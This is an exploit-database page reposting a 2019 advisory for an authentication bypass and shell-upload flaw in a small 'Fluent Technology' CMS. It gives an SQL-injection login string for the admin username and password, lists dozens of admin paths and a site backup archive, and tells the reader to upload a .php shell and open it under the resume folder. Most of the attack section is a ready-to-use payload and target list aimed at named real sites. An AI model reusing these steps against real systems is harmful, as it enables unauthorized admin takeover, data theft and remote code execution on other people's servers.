Advertisement






Giribala Creative Ventures Fluent Technology Software Authentication Bypass Backdoor Access Vulnerab

CVE Category Price Severity
N/A CWE-287 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2019-09-15
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090104

Below is a copy:

Giribala Creative Ventures Fluent Technology Software Authentication Bypass Backdoor Access Vulnerability
####################################################################

# Exploit Title : Giribala Creative Ventures Fluent Technology Software Authentication Bypass Backdoor Access Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/08/2019
# Vendor Homepage : fluenttechnology.com - facebook.com/chemicals4construction
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-287 [ Improper Authentication ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
* Authentication is any process by which a system verifies the identity of a user who wishes 
to access it.When an actor claims to have a given identity, the software does not 
prove or insufficiently proves that the claim is correct and besides it allows 
upload a file/shell/backdoor on the system without administrator permission. 
Improper authentication occurs when an application improperly verifies the identity of a user. 
A software incorrectly validates user's login information and as a result, an attacker can 
gain certain privileges within the application or disclose sensitive information that allows 
them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during Architecture and Design, Implementation stages.
* The software allows the attacker to upload or transfer files of dangerous types that 
can be automatically processed within the product's environment.

####################################################################

# Authentication Bypass / Admin Panel Login Bypass Exploit :
******************************************************
Admin Panel Login Path : 
/fluentcms/

Admin Username : '=''or'
Admin Password : '=''or'

/fluentcms/index.php
/fluentcms/add-admin.php
/fluentcms/adminlist.php
/fluentcms/add-banner.php
/fluentcms/banner.php
/fluentcms/add-page.php
/fluentcms/page.php
/fluentcms/add-listing.php
/fluentcms/listing.php
/fluentcms/orderlist.php
/fluentcms/add-plancategory.php
/fluentcms/plan-category.php
/fluentcms/add-palnFacility.php
/fluentcms/plan-facility.php
/fluentcms/add-category.php
/fluentcms/category.php
/fluentcms/add-admin.php
/fluentcms/add-subcategory.php
/fluentcms/subcategory.php
/fluentcms/pro-category.php
/fluentcms/pro-categorylist.php
/fluentcms/add-product.php
/fluentcms/product.php
/fluentcms/add-keyword.php
/fluentcms/keyword.php
/fluentcms/add-certificate.php
/fluentcms/user-account.php
/fluentcms/purchase-item.php
/fluentcms/add-lead.php
/fluentcms/leads.php
/fluentcms/add-workcontract.php
/fluentcms/workcontract.php
/fluentcms/project.php
/fluentcms/add-tender.php
/fluentcms/tender.php
/fluentcms/add-project.php
/fluentcms/add-article.php
/fluentcms/article.php
/fluentcms/add-news.php
/fluentcms/news.php
/fluentcms/add-events.php
/fluentcms/events.php
/fluentcms/add-market.php
/fluentcms/market.php
/fluentcms/add-rawMaterial.php
/fluentcms/rawMaterial.php
/fluentcms/add-summuryReport.php
/fluentcms/summuryReport.php
/fluentcms/add-sellingProduct.php
/fluentcms/sellingProduct.php
/fluentcms/add-expertTalk.php
/fluentcms/expertTalk.php
/fluentcms/add-industries.php
/fluentcms/industries.php
/fluentcms/business-inquiry.php
/fluentcms/product-inquiry.php
/fluentcms/lead-inquiry.php
/fluentcms/event-inquiry.php
/fluentcms/biz-quat.php
/fluentcms/prod-quat.php
/fluentcms/bquat-conforder.php
/fluentcms/po_listing.php
/fluentcms/add-job.php
/fluentcms/jobpost.php
/fluentcms/add-applypost.php
/fluentcms/applypost.php
/fluentcms/add-applyjob.php
/fluentcms/applyjob.php
/fluentcms/add-advertisement.php
/fluentcms/advertisement.php
/fluentcms/add-alert.php
/fluentcms/alert.php
/fluentcms/requirement-post.php
/fluentcms/setting.php
/add-admin.php
/add-listing.php
/add-post-job.php
/chemicals4construction.com.zip
/edit-post.php
Shell Upload / Backdoor Access 
/fluentcms/certificate-list.php
Upload Shell File with .php extension to access backdoor on the system
/fluentcms/resume/[Random-Numbers-Letters].php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum